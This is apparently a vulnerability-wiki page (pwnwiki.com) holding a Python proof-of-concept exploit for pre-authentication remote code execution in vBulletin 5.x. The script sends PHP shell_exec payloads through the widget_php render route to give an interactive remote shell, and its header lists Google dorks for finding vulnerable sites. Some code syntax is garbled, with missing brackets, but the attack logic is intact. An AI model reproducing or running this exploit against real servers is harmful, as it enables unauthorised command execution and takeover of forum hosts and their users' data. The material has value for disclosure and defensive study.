pwnwiki.com
,
POC
#!/usr/bin/python
#
# vBulletin 5.x 0day pre-auth RCE exploit
#
# This should work on all versions from 5.0.0 till 5.5.4
#
# Google Dorks:
# - site:*.vbulletin.net
# - "Powered by vBulletin Version 5.5.4"
import requests
import sys
if len(sys.argv) != 2:
sys.exit("Usage: %s <URL to vBulletin>" % sys.argv0)
proxies ={
"http":"http://127.0.0.1:8080/"
}
params = {"routestring":"ajax/render/widget_php"}
while True:
try:
cmd = raw_input(">>>Shell= ")
params"widgetConfigcode" = "echo shell_exec('"+cmd+"');echo md5('vBulletin'); exit;"
r = requests.post(url = sys.argv1, data = params, proxies=proxies)
if r.status_code == 200 or r.status_code ==403 and 'be4ea51d962be8308a0099ae1eb3ec63' in r.text:
print
print r.text.split('be4ea51d962be8308a0099ae1eb3ec63')0
else:
sys.exit("Exploit failed! :(")
except KeyboardInterrupt:
sys.exit("\nClosing shell...")
except Exception, e:
sys.exit(str(e))
免费、自由、人人可编辑的漏洞库
